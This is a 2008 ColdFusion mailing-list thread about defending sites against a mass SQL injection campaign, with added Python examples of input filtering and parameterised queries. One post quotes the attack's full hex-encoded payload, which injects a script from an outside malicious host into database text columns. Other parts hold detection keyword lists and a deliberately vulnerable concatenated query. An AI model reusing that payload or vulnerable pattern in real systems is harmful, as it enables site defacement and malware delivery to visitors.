deal with it at that point
3. Put in place some ColdFusion code that checks all forms of user
input for malicious code and that deals with it appropriately
4. Start the daunting task of putting cfqueryparam where it wasn't
already (daunting for those who have inherited apps with thousands of
queries, none of which used it)
A scan of this thread should get you the info on the rewrites rules
and CF code that people have put forward.
HTH
Dominic
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311117
>I can't vouch for php, .Net but at least in the Java world ORM reduces that
>risk to nil. And its built into the ORM, so if the ORM can't work out your
>polymorphic function in the database then how does it do it?
php is as ColdFusion and Java; you can use a plain query string or use
a parameterised statement / prepared statement. If you use the prepared
statement, you are protected from SQL injection (unless your SQL is
running some code on the db that takes your input and runs it as
dynamic SQL, of course ;).
I think the main trouble with cfqueryparam is that it has not been
pushed enough in the documentation and in books. This is why reams of
application are not using it - the people writing the queries did not
know any different. I would say the same is true of php and prepared
statements though I have not enough experience in php to vouch for
that.
ORM is brilliant and hibernate appears to be great news for CF9.
However, I believe that ORM is an application design *choice* and not
something to be forced by the language (therefore hibernate will not
interfere with cfquery I presume. That said, I think that if CF could
make use of hibernate's data mapping knowledge to rewrite a plain
query to be a parameterised one, that would be great news indeed. I
think that is what Andrew is getting at - if it could be done
efficiently and without configuration or convention that would have to
be welcome.
A question for anyone who knows hibernate then; does it require
configuration per database, rely on convention or does it query the
schema to generate its mappings automatically?
Dominic
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311115
I am new to the post, but I have been programming in CF for over 10 years and
know some of you from the CF Forums.
I am getting slammed with this crud as well on over 30 of my websites. Any
suggestions as how to handle this for multiple sites on 1 server? I just
discovered the issue as it seems to be targeting multiple sites on my server.
David G. Moore, Jr.
UpstateWeb, LLC
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311113
----- Excess quoted text cut - see Original Post for more -----
>Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311114
>> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?
Denstar, dig out your neo-security.xml file. In my Windows CF8 standalone
install it is located in C:\ColdFusion8\lib\neo-security.xml
Look at the following section:
<var name="CrossSiteScriptPatterns">
<struct type="coldfusion.server.ConfigMap">
<var name="<\s*(object|embed|script|applet|meta)">
<string><InvalidTag</string>
</var>
</struct>
</var>
When you check the "Enable Global Script Protection" check box on the
Settings page of ColdFusion Administrator, requests are filtered if anything
in the Form, URL, CGI, or Cookie scope matches this regex:
"<\s*(object|embed|script|applet|meta)"
What Jochem is saying, is to add to that regex to filter for whatever else
you want and enable that setting.
While I agree with Jochem that request filtering is NOT the appropriate way
to secure your application, this is a rather slick approach.
Also note, this is NOT rewriting. It is not happening at the network
level, nor is it happening at the web server level (Apache, IIS). The
requests are filtered when they reach ColdFusion.
~Brad
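What that ConfigMap does at request time, as an added Python emulation (not code from the thread or from ColdFusion itself): the pattern is read from the fragment Brad quotes and applied to the Form, URL, CGI and Cookie scopes of a constructed request, rewriting each match to <InvalidTag. Case-insensitive matching and the sample request are assumptions; a value such as O'Brien passes untouched, which illustrates Brad's point that this is filtering, not a substitute for cfqueryparam.

```python
import re
import xml.etree.ElementTree as ET

# The CrossSiteScriptPatterns section Brad quotes, as a constructed XML
# fragment. The "<" inside the attribute is written as &lt; so a standard XML
# parser accepts it; the on-disk file is read by ColdFusion's own loader.
NEO_SECURITY_FRAGMENT = r"""
<var name="CrossSiteScriptPatterns">
  <struct type="coldfusion.server.ConfigMap">
    <var name="&lt;\s*(object|embed|script|applet|meta)">
      <string>&lt;InvalidTag</string>
    </var>
  </struct>
</var>
"""


def load_patterns(xml_text):
    """Return {regex: replacement} from a CrossSiteScriptPatterns <var> element."""
    root = ET.fromstring(xml_text.strip())
    struct = root.find("struct")
    return {v.get("name"): v.findtext("string") for v in struct.findall("var")}


def apply_script_protection(scopes, patterns):
    """Emulate Global Script Protection: every value in the Form, URL, CGI and
    Cookie scopes is run through each pattern and matches are rewritten to the
    replacement text. Case-insensitive matching is an assumption of this demo.
    Returns (filtered_scopes, hits) where hits lists (scope, name, count)."""
    compiled = [(re.compile(p, re.IGNORECASE), r) for p, r in patterns.items()]
    filtered, hits = {}, []
    for scope, variables in scopes.items():
        filtered[scope] = {}
        for name, value in variables.items():
            new_value = value
            for regex, replacement in compiled:
                new_value, count = regex.subn(replacement, new_value)
                if count:
                    hits.append((scope, name, count))
            filtered[scope][name] = new_value
    return filtered, hits


# Constructed request: one HTML tag in a form field, a spaced-out tag in a URL
# variable, and an ordinary value containing a single quote.
SAMPLE_REQUEST = {
    "form": {"comment": "<script>hi</script>", "author": "O'Brien"},
    "url": {"title": "Fun with <  Meta tags"},
    "cgi": {"http_user_agent": "Mozilla/5.0"},
    "cookie": {"cfid": "12345"},
}


def demo():
    """Run the stock pattern over the constructed request."""
    return apply_script_protection(SAMPLE_REQUEST, load_patterns(NEO_SECURITY_FRAGMENT))


if __name__ == "__main__":
    filtered, hits = demo()
    print(filtered["form"]["comment"])  # <InvalidTag>hi</script>
    print(filtered["form"]["author"])   # O'Brien (untouched)
    print(hits)                         # [('form', 'comment', 1), ('url', 'title', 1)]
```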
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311111
Man, you're about 6 months late with that news....
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311110
Have you ever done any GORM work?
Now technically embedding hibernate into ColdFusion would technically be
under the hood as far as ColdFusion is concerned.
I mean, I might as well by your reasoning say that ajaxUI is not under the
hood in ColdFusion because it uses a 3rd party library to do its work.
In the advent that ColdFusion does incorporate hibernate it will technically
be under the hood, because your tags / functions call internal wrappers to
ColdFusion to do the work for you.
So technically GORM and its Domain Driven Design, is considered to be under
the hood.
Technically....
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311109
You'll be happy to know that CF9 is rumoured to include Hibernate with
a corresponding set of tags, so CF should indeed be able to deal with
this under the hood.
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311108
Andrew Scott wrote:
> I stand by the fact that cfqueryparam, can and should be taken care of under
> the hood. Other languages are doing it, so what does that tell you?
It tells me that they need additional configuration or convention.
I have 2 functions with the following signatures in my database:
find(needle:char, haystack:text):boolean
find(needle:varchar, haystack:text):boolean
I call the database in one place using:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_varchar" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
In another place I use:
<cfquery ...>
SELECT find(
<cfqueryparam cfsqltype="cf_sql_char" value="#x#" />,
<cfqueryparam cfsqltype="cf_sql_varchar" value="#y#" />
)
</cfquery>
Along comes your ColdFusion version that can determine datatypes to bind
to automagically. So now I start using:
<cfquery ...>
SELECT find('#x#', '#y#')
</cfquery>
But which of the two find() functions in the database is going to get
executed?
The only way to make sure a specific find() function is executed in the
database is by configuring the ORM to do so. Fine, problem solved. But
that is not under the hood.
ORMs need configuration too. That is not under the hood.
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311107
Actually,
That should have been the reverse on URL filtering :-( In other words, I
should or could write a filter to do the checking for SQL injections. Sorry,
my bad there. But it is only one way to do it.
Anyway, as I do Grails work I dug this link up for you all...
http://docs.codehaus.org/display/GRAILS/Security
So it is possible to do under the hood. Now I can't vouch for Transfer, but I
do know Mark would have used cfqueryparam. Now as it is written in
ColdFusion in most parts, it does take care of it, so as a developer I
don't need to worry about SQL injection as I am confident that Transfer
has taken care of it for me. That is a typical example of how ColdFusion can
and should do it under the hood.
And take particular notice of how the data is escaped when committing to the
database.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311106
----- Excess quoted text cut - see Original Post for more -----
Unrelated, but isn't our government pretty much listening to all the
chatter across the wires? Pity to think we couldn't take advantage of
that infrastructure. </joke>
[...]
> There is no way CF can guess the right datatypes to bind my function
> arguments to when I call a polymorphic function in the database.
This, I'm curious about. Aren't there ways to use some type of introspection?
Bah. I see your point, even if so, you end up having to understand
every type of SQL, if from a different angle. No easy java SQL parser
to throw in, I guess.
Still, there aren't *that* many DBs out there that would need to be
supported... :-)p
> I haven't mentioned this before because I do believe that filtering
> request URLs is the wrong approach
Care to elaborate on this?
Even just a couple of rules in an apache conf file has helped quite a
bit to eliminate these spam hits on CF, without impacting anything
else, that I'm aware of... are you thinking something closer to the
network level?
Every piece you add opens holes, and I used to sorta shun rewriting
because of that, but, who am I kidding? :-) And it seems like
rewriting is pretty common-place, so pretty vetted. But I'd love to
hear your take on the URL request filtering, Jochem!
:Denny
--
Few of the many wise apothegms which have been uttered have prevented
a single foolish action.
Thomas B. Macaulay
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311105
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
And you haven't seen Grails then, you can't get any more of a dynamic
language than that :-)
It uses GORM, which is an entry point to Hibernate and guess what, it takes
care of everything I spoke about.
Still no reason ColdFusion can't, and I will stand by that.
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311104
Hmm,
I wasn't trying to compare ColdFusion to Grails, I used Grails as an example
because it relies heavily on an ORM. The ORM has the needed datatypes for
the DB (or bind / prepared statements), but when it comes to SQL injection,
it doesn't appear to be an issue.
Please read what I said, I wasn't trying to compare apples to oranges. But
they both have the ability to be infected, it is up to how that protection
is put into place as to how much work is involved by the developer.
I stand by the fact that cfqueryparam can and should be taken care of under
the hood. Other languages are doing it, so what does that tell you?
That way older code can automatically be protected behind the scenes with
no change to the application you design. It's not rocket science, but it is
something to consider.
Hibernate has no problems with SQL injection, why is that?
Because Hibernate DOES use prepared statements under the hood, so if it can
there is no reason why ColdFusion can't.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311103
>>they are back.
Yeah, here too.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311102
Andrew Scott wrote:
> I believe IP spoofing is still a huge problem. I know little about it, so no
> more comment on that but a quick google shows that it is still a huge
> problem.
AIDS is a huge problem too. It is also about equally relevant for the
current wave of SQL injection attacks.
> As for polymorphic functions, that is not the issue. SQL injection is mainly
> passed via the URL, header or some form of post to the server. A filter can
> be placed to introspect every request to check the URL for known SQL
> injection attacks.
Yes, a sufficiently advanced filter (basically an allow list of values)
can do that. But you did not claim a filter could do that, you claimed
ColdFusion could do anything cfqueryparam does under the hood. And that
is just not true. It is impossible to extrapolate the correct datatype
of input BIND variables from the text of the query string. You need code
or convention for that.
> I can't vouch for php, .Net but at least in the Java world ORM reduces that
> risk to nil. And its built into the ORM, so if the ORM can't work out your
> polymorphic function in the database then how does it do it?
With an ORM in combination with an untyped language my use case of
polymorphic functions would probably end up as a configuration issue in
the ORM and the ORM exposing multiple functions to the application.
> This thread was about SQL injection, and a better response would be for
> the CFML engine to intercept every request and reject anything that looks
> remotely like a SQL injection attack.
But you can do that already. Just fiddle with the allowed SQL options in
CF and observe the random failures in the application as CF tries to
interpret SQL.
Whatever the solution is, it is not teaching CF how to interpret SQL. CF
is the CFML runtime and should leave the interpretation of SQL to the
database.
> If you were in the Java, Grails world there is no such thing as
> cfqueryparam. They do it under the hood, and there is no real reason that
> ColdFusion can't adopt the same.
Maybe the tags don't exist, but in Java the concepts do. In fact, the
CFML constructs map directly to Java classes:
cfquery -> java -> jdbc -> statement
cfquery + cfqueryparam -> java -> jdbc -> preparedstatement
cfstoredproc -> java -> jdbc -> callablestatement
And I think Dave already explained to you why you shouldn't compare
Grails and ColdFusion. Now, if you wanted to compare ModelGlue Unity and
Grails, you will see that neither exposes cfqueryparam like
functionality to the programmer. (But please don't claim the concepts
aren't there, they are just hidden behind an ORM).
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311101
Hmmm,
I believe IP spoofing is still a huge problem. I know little about it, so no
more comment on that, but a quick google shows that it is still a huge
problem.
As for polymorphic functions, that is not the issue. SQL injection is mainly
passed via the URL, header or some form of post to the server. A filter can
be placed to introspect every request to check the URL for known SQL
injection attacks.
That would then remove the need to have extra overhead for each query,
because the initial request would have already been checked. So if you were
to have a component with 20 queries, and have hits of around 1000, the cycles
to do SQL protection in the cfqueryparam would be reduced to one check and
not 20 * 1000, but 1000 only. Surely that increase in speed has to be worth
something? No?
As for what else cfqueryparam offers, this can be handled by the cfquery
tag. After all ColdFusion has been using JDBC drivers for a long time; the
cfqueryparam was introduced in the days when ColdFusion was not built on top
of Java. That means that the extra features that JDBC drivers introduce
(like pooling, binding etc.) can be taken care of under the hood. And with a
proper ORM, it would know what datatype you are requesting anyway.
But as I stated once before, ColdFusion 9 with Hibernate native support
would eliminate the SQL injection problem.
I can't vouch for PHP, .Net but at least in the Java world ORM reduces that
risk to nil. And it's built into the ORM, so if the ORM can't work out your
polymorphic function in the database then how does it do it?
This thread was about SQL injection, and a better response would be for
the CFML engine to intercept every request and reject anything that looks
remotely like a SQL injection attack.
If you were in the Java, Grails world there is no such thing as
cfqueryparam. They do it under the hood, and there is no real reason that
ColdFusion can't adopt the same.
How hard is that to understand?
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311098
Andrew Scott wrote:
> Ever heard of IP spoofing? Sure you need to complain about it, but the one
> thing they need to do is track the packets.
IP spoofing is really only a significant problem with UDP. With TCP any
decent ISP will catch spoofs in their egress filters. Even your cheap,
Taiwanese black box NAT router at home will stop spoofing for TCP
because it won't be able to match the NAT state.
You just send your complaints to the abuse department of their ISP and
they will handle it. Or not, but that is really out of your hands.
> But yes start with your IP, give them as much info as they need to do their
> job with. It is then in their hands to contact the authorities to have the
> individual charged.
You want to charge somebody because his computer is infected with a trojan?
> Which leaves me to something I have stated before, why the hell Coldfusion
> didn't build this under the hood to begin with I do not know. Then it
> wouldn't matter if you use cfqueryparam or not, there is nothing that this
> tag does that couldn't be done under the hood.
There is no way CF can guess the right datatypes to bind my function
arguments to when I call a polymorphic function in the database.
> I mean with all the filters that Coldfusion has from ajax to flex
> integration, one more filter for URL's would have been simple.
I haven't mentioned this before because I do believe that filtering
request URLs is the wrong approach, but I'll let you in on a little
secret: you can plug your filter regular expressions right into
neo-security.xml. No need to change anything in any application, you
just plug it in and enable the scriptprotect feature.
Jochem
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311097
LOL...
Ever heard of IP spoofing? Sure you need to complain about it, but the one
thing they need to do is track the packets. This will only work if all paths
along the way have log capturing to traverse the MAC address to get the
correct IP address.
But yes, start with your IP, give them as much info as they need to do their
job with. It is then in their hands to contact the authorities to have the
individual charged.
I think this is one reason that there is not enough done when it comes to
DoS and SQL injections.
Which leaves me to something I have stated before, why the hell ColdFusion
didn't build this under the hood to begin with I do not know. Then it
wouldn't matter if you use cfqueryparam or not, there is nothing that this
tag does that couldn't be done under the hood.
However, it will not stop people from trying :-(
I mean with all the filters that ColdFusion has from ajax to flex
integration, one more filter for URLs would have been simple.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311095
Mark Mandel wrote:
> What I'm curious about, is that there seems to be no one you can report this
to?
You can report it to the abuse department of the ISP of the originating
IP. Just look up the IP delegation and the abuse address is usually
right there.
Jochem
Author: mac jordan
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311092
> They completely stopped on the 11th, but they are back today spelling it
> like "DeCLARE".
>
We're seeing the same - we're using RegExp to pick 'em up now.
--
mac jordan
www.webhorus.net | www.reactivecooking.com | www.nibblous.com |
www.jordan-cats.org
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311091
> What I'm curious about, is that there seems to be no one you can report this
to?
Well, I'm pretty sure there is something we could do, but the general
attitude seems to be to just suck it up.
And buy some stocks in the tech hardware/broadband market.
;]
--
I got 3 new servers, and a
switch!
Author: Mark Mandel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311085
What I'm curious about, is that there seems to be no one you can report this to?
I got hammered again the other day.. this time as well through
whatever form fields they could find.
Mark
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311070
And changed
EXEC to ExEC
I am getting hit pretty hard again. It stopped for a few days but
they are back.
At 06:56 PM 8/15/2008, you wrote:
>They completely stopped on the 11th, but they are back today spelling it
>like "DeCLARE".
>
>~Brad
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311063
They completely stopped on the 11th, but they are back today spelling it
like "DeCLARE".
~Brad
> >>Not as far as technique, but it was much larger in scale than most
of us
> have experience before.
>
> By the way, are you still getting hits from this attack?
> I don't see any anymore.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311062
>>Not as far as technique, but it was much larger in scale than most of us
have experienced before.
By the way, are you still getting hits from this attack?
I don't see any anymore.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311061
>>Going through 136+ posts seems a bit too much, many thanks.
Aren't you afraid to get even more if you start another thread again? ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311056
As an FYI: for those that did use Apache configs to stop this attack, if you
did not make sure your check was not case sensitive you're being hit again.
I just saw this start coming into our logs this afternoon. Note that DECLARE
changed to DeCLARE. Some of the posts I saw for people to modify Apache
were checking for DECLARE in case sensitive mode.
Cheers,
It looks like the storm is still trying to rage.
Wil Genovese
;DeCLARE%20@S%20CHAR(4000);SET%20@S
=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430
303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F
6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720
616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729
204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F
63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C21
2D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
On Fri, Aug 15, 2008 at 3:30 PM, Justin Scott <jscott@gravityfree.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
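The check Wil's post calls for, as an added example in Python rather than code from Wil, from the Apache rules others posted, or from any of the tools linked in this thread. It runs over three constructed query strings: the probe shape spelt DECLARE, the same shape spelt DeCLARE, and a benign request. The SQL inside the hex literal and the script host (attacker.example) are invented for the example; only the outer `;DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S);` shape follows the probe quoted above. It shows why the case-sensitive substring rule stopped working, and why the hex literal has to be unpacked before any keyword list is applied to it:

```python
import re
from urllib.parse import unquote


def hex_literal(sql):
    """Encode SQL the way the probe did: a 0x... literal for CAST(... AS CHAR)."""
    return "0x" + sql.encode("ascii").hex().upper()


# Constructed sample query strings (not copied from the post).  The SQL inside
# the hex literal and the script host are invented; the outer shape follows the
# probe Wil quoted, with a short body instead of the real 4000-character one.
INNER_SQL = ("DECLARE @T varchar(255) UPDATE pages SET body=body+"
             "'<script src=\"http://attacker.example/w.js\"></script>'")
SAMPLE_QUERY_STRINGS = [
    # upper case, as the first wave spelt it
    "id=5;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(" + hex_literal(INNER_SQL)
    + "%20AS%20CHAR(4000));EXEC(@S);",
    # mixed case, as the second wave spelt it
    "id=5;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(" + hex_literal(INNER_SQL)
    + "%20AS%20CHAR(4000));ExEC(@S);",
    # a benign request
    "id=5&sort=title",
]

# Compiled once at import time.  Python's compiled Pattern objects are safe to
# share between threads (unlike the stateful java.util.regex.Matcher discussed
# earlier in the thread); only the match results are per call.
HEX_CAST = re.compile(
    r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.IGNORECASE)
SQLI_MARKERS = re.compile(
    r"\b(?:declare|exec|cast|sysobjects|syscolumns|xp_cmdshell)\b", re.IGNORECASE)


def naive_flag(raw):
    """The rule that stopped working: a case-sensitive substring check."""
    return "DECLARE" in raw


def decode_hex_casts(text):
    """Return the SQL hidden inside every CAST(0x... AS CHAR) literal in text."""
    return [bytes.fromhex(h).decode("ascii", "replace") for h in HEX_CAST.findall(text)]


def classify(raw):
    """Return (flagged, markers) for one raw query string.

    Percent-decodes twice (for double-encoded probes), unpacks hex CAST
    literals so the keywords inside them are visible, then matches the
    keyword list case-insensitively.  Markers come back lower-cased, sorted."""
    text = unquote(unquote(raw))
    haystack = " ".join([text] + decode_hex_casts(text))
    markers = sorted({m.group(0).lower() for m in SQLI_MARKERS.finditer(haystack)})
    return bool(markers), markers


if __name__ == "__main__":
    for qs in SAMPLE_QUERY_STRINGS:
        print("naive:", naive_flag(qs), " decoded:", classify(qs), " ", qs[:32])
```

`naive_flag` catches the first sample and misses the second; `classify` flags both and leaves the benign request alone. A keyword list like this is still a blocklist: it only buys time while old queries are moved to cfqueryparam, and an attacker who changes encoding again will get past it, which is why the allow-list of permitted values Jochem describes is the stronger filter.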
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311055
> But I know all this, I thought the sql injection attack went beyond it,
thanks anyway, Justin.
Not as far as technique, but it was much larger in scale than most of us
have experienced before. Some were getting hit so hard they had to
filter it farther up the chain (IIS, firewall, etc.) but for the
majority of us the standard secure coding methods kept it out.
-Justin Scott
Author: Charlie Griefer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311054
On Fri, Aug 15, 2008 at 1:12 PM, D
> But I know all this, I thought the sql injection attack went beyond it,
> thanks anyway, Justin.
>
it did not.
--
A byte walks into a bar and orders a pint. Bartender asks him "What's
wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought
you looked a bit off."
Author: Don L
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311051
But I know all this, I thought the sql injection attack went beyond it, thanks
anyway, Justin.
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311050
> Sorry for the "top posting", where are we now in terms of best practice for
cf8 protection against SQL injection attack? Going through 136+ posts seems a bit
too much, many thanks. Someone who has closely monitored this thread probably
could help.
The same place we've always been:
* Validate user input
* Use CFQUERYPARAM
For applications that have old code, run a tool that will tell you what
queries need to be updated or run a front-end filter that will do a
basic check on input while you're updating that old code to use proper
security methods.
CFQUERYPARAM:
http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html
Query scanning tools:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
Basic URL value filter:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
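Justin's two rules side by side, as an added example that is not code from his post or from the tools he links. Python's sqlite3 module stands in for cfquery over JDBC; the table, its two rows and the probe string are constructed for the example. The probe mirrors the first step of the attack this thread is about, reading the schema catalogue through an injected UNION (sqlite_master here, sysobjects/syscolumns in the real payload). The concatenated form is deliberately vulnerable; the bound form is the shape cfqueryparam gives you, a fixed statement with the value sent separately, which is what a JDBC PreparedStatement does:

```python
import sqlite3

# Constructed sample content, standing in for a site's page table (not data
# from the post).  The probe string mirrors the first step of the attack the
# thread discusses: reading the schema catalogue through an injected UNION.
SEED_ROWS = [("Welcome", "Hello"), ("About", "Info")]
UNION_PROBE = "0 UNION SELECT name, sql FROM sqlite_master"


def make_db():
    """Fresh in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def lookup_concat(conn, page_id):
    """A <cfquery> with #url.id# pasted straight into the SQL.

    The request value becomes part of the statement text, so the database
    parses whatever the caller sent as SQL (deliberately vulnerable)."""
    sql = "SELECT title, body FROM pages WHERE id = " + str(page_id)
    return conn.execute(sql).fetchall()


def lookup_bound(conn, page_id):
    """The <cfqueryparam> shape: fixed SQL text, value sent as a bound parameter.

    The value can never change the statement's structure, whatever characters
    it contains; the database compares it to id and finds nothing."""
    cur = conn.execute("SELECT title, body FROM pages WHERE id = ?", (page_id,))
    return cur.fetchall()


def lookup_validated(conn, raw_value):
    """Both of Justin's rules: validate the input first, then bind it."""
    if not str(raw_value).isdigit():
        raise ValueError("page id must be a non-negative integer, got %r" % (raw_value,))
    return lookup_bound(conn, int(raw_value))


if __name__ == "__main__":
    db = make_db()
    print("concatenated, honest id:", lookup_concat(db, 1))
    print("concatenated, probe:    ", lookup_concat(db, UNION_PROBE))
    print("bound, honest id:       ", lookup_bound(db, 1))
    print("bound, probe:           ", lookup_bound(db, UNION_PROBE))
```

With the probe, `lookup_concat` hands back the CREATE TABLE statement for every table, exactly the enumeration step the hex payload quoted earlier in the thread performs against sysobjects; `lookup_bound` returns no rows because the whole string is compared against the id column as a value, and `lookup_validated` refuses it before it reaches the database at all.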
Author: Don L
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311049
Sorry for the "top posting", where are we now in terms of best practice for cf8
protection against SQL injection attack? Going through 136+ posts seems a bit too
much, many thanks. Someone who has closely monitored this thread probably could
help.
----- Excess quoted text cut - see Original Post for more -----
Author: David Lakein
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310901
----- Excess quoted text cut - see Original Post for more -----
I also had a concern about thread safety; it's caching the
java.util.regex.Matcher object in Application scope, and calling
Application.injChecker.reset(testvar) for each url/form/etc variable -- seems
like Matcher.reset() changes state of the cached Matcher object?
It might be safer to cache the Pattern, then get the rePattern.matcher('') on
each request.
Looks cool otherwise, though I might remove some of the keywords from the regex
before using here.
Thanks,
- David
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310885
> You of all people have been around long enough to know, that
> if we as a developer could have our jobs made easier. Makes
> me wonder why you made your comment?
I don't see it as Adobe's place to tell me how to write code, which is
essentially what a framework of any type does. In the same way that Sun
doesn't distribute frameworks for Java, I don't see this as a job for Adobe.
I would be ok with them making CF more "friendly" to Hibernate-like
frameworks - compiling CFCs as discrete Java classes rather than a bunch of
classes, one for each function, for example.
> Grails is built on top of Java, just as much as ColdFusion
> is. So what is your point?
While CF is a Java application, from the CF developer's perspective it's a
programming language. Frameworks aren't incorporated in programming
languages for a very good reason - people have different opinions about
which frameworks to use.
> But one can dream..... Like you said, I also doubt it will
> become open source this release... Or even the next, but it
> will happen... Mark those words...
Not while it's offered for sale by Adobe.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
